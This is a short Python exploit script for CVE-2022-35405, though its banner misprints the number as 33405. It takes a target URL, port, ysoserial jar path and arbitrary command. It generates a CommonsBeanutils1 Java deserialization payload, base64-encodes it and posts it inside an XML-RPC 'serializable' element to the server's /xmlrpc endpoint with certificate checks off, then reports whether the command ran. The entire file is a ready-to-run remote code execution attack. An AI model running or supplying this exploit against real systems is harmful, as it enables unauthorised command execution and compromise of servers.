CVE-2022-35405.py

import requests
import os
import argparse

print('CVE-2022-33405 - Engines RCE exploit :)')
parser = argparse.ArgumentParser(description='')
parser.add_argument('-u', '--url', help='URL of the server', required=True)
parser.add_argument('-p', '--port', help='Port of the server', required=True)
parser.add_argument('-j', '--jar', help='Path to the YSoserial jar', required=True)
parser.add_argument('-c', '--command', help='Command to execute on server', required=True)

args = parser.parse_args()
url = args.url
if url[-1:] == '/':
    url = url[:-1]
port = args.port
jar = args.jar
command_payload = args.command

requests.packages.urllib3.disable_warnings()

def ysoserial(command_payload, jar):
    o =  os.popen(f'java -jar {jar} CommonsBeanutils1 "{command_payload}" | base64 | tr -d "\\n"').read()
    print(f'[+] Payload: {o}')
    return o
    
def make_request(url, port, ysoserial_payload):
    url = f"{url}:{port}/xmlrpc"
    headers = {"Connection": "close", "Content-Type": "application/xml"}
    data = f'<?xml version="1.0"?><methodCall><methodName>big0us</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{ysoserial_payload}</serializable></value></member></struct></value></param></params>'
    r = requests.post(url, headers=headers, data=data, verify=False)
    if 'java.lang.reflect.InvocationTargetException' in r.text:
        print(f'[+] Successfully executed command')
    else:
        print(f'[-] Failed to execute command')
        print(f'[-] Response: {r.text}')

print(f'[+] Command: {command_payload}')
ysoserial_payload = ysoserial(command_payload, jar)
make_request(url, port, ysoserial_payload)